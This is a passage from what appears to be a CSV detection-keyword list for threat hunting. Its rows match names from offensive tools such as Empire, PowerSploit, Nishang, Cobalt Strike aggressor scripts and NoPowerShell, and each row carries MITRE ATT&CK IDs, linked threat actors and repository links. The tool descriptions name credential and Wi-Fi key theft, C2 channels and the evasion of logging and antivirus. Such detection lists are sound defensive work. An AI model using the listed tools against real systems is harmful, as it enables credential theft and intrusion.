HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46318"
"*Get-VaultCreds*",".{0,1000}Get\-VaultCreds.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46319"
"*Get-VolumeShadowCopy *",".{0,1000}Get\-VolumeShadowCopy\s.{0,1000}","offensive_tool_keyword","Powersploit","PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that could be used for extraction of files","T1003 - T1103 - T1213","TA0006 - TA0009 - TA0010","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Collection","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46320"
"*Get-VolumeShadowCopy*",".{0,1000}Get\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46321"
"*Get-VulnAutoRun*",".{0,1000}Get\-VulnAutoRun.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46322"
"*Get-VulnSchTask*",".{0,1000}Get\-VulnSchTask.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46323"
"*Get-WebCredentials*",".{0,1000}Get\-WebCredentials.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46324"
"*Get-WebCredentials.ps1*",".{0,1000}Get\-WebCredentials\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46325"
"*GetWebDAVStatus.csproj*",".{0,1000}GetWebDAVStatus\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46326"
"*GetWebDAVStatus.sln*",".{0,1000}GetWebDAVStatus\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46327"
"*GetWebDAVStatus_DotNet*",".{0,1000}GetWebDAVStatus_DotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46328"
"*GetWebDAVStatus_x64.o*",".{0,1000}GetWebDAVStatus_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46329"
"*GetWhoamiCommand*",".{0,1000}GetWhoamiCommand.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","46330"
"*GetWhoamiCommand.cs*",".{0,1000}GetWhoamiCommand\.cs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","46331"
"*GetWindowsCredentials.exe*",".{0,1000}GetWindowsCredentials\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","46332"
"*Get-WinUpdates.ps1*",".{0,1000}Get\-WinUpdates\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46333"
"*Get-Wlan-Keys*",".{0,1000}Get\-Wlan\-Keys.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46334"
"*Get-WLAN-Keys*",".{0,1000}Get\-WLAN\-Keys.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46335"
"*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","46336"
"*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46337"
"*Get-Wlan-Keys.ps1*",".{0,1000}Get\-Wlan\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46338"
"*Get-WMIEventLogins*",".{0,1000}Get\-WMIEventLogins.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","46339"
"*Get-WMIRegCachedRDPConnection *",".{0,1000}Get\-WMIRegCachedRDPConnection\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46344"
"*getwmiregcachedrdpconnection*",".{0,1000}getwmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46345"
"*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46346"
"*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46347"
